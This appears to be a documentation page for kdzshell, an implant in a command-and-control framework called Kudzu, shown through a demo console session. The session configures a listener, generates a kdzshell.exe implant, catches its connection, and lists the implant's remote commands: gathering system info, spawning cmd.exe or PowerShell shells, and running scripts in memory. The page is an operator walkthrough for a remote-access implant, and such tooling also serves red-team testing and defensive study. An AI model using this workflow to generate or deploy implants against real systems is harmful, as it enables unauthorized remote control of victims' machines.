kdzshell
kdzshell is Kudzu's "advanced" implant.
Demo
<kudzu> nodes
<kudzu nodes> run
<kudzu nodes> ls
Nodes:
Listeners:
a7ba067be9 127.0.0.1:7896
<kudzu nodes> implants
<kudzu implants> setop implanttype kdzshell
<kudzu implants> setop listener a7ba067be9
<kudzu implants> showops
Filename
ImplantType: kdzshell
Listener ID: {a7ba067be9 0xc000208980}
<kudzu implants> setop filename kdzshell.exe
<kudzu implants> run
{kdzshell kdzshell.exe {a7ba067be9 0xc000208980}}
proceed? Y/N > y
generated implant! check ../tmp/kdzshell.exe
<kudzu implants> Got Connection ID: e87b05bdff 127.0.0.1:7896
<kudzu implants> nodes
<kudzu nodes> interact e87b05bdff
interacting...
e87b05bdff
found node for interaction
<kudzu shell> help
sysinfo: print system info to console
kdz_bg: background current session, return to kdz console
kdz_exit: exit current session, return to kdz console
runscript: run provided kzs in memory. usage: runscript win_calc.kzs
<kudzu shell> cmdshell: spawn cmd.exe shell
pwshell: spawn powershell.exe shell
<kudzu shell> runscript win_calc.kzs
<kudzu shell>Last updated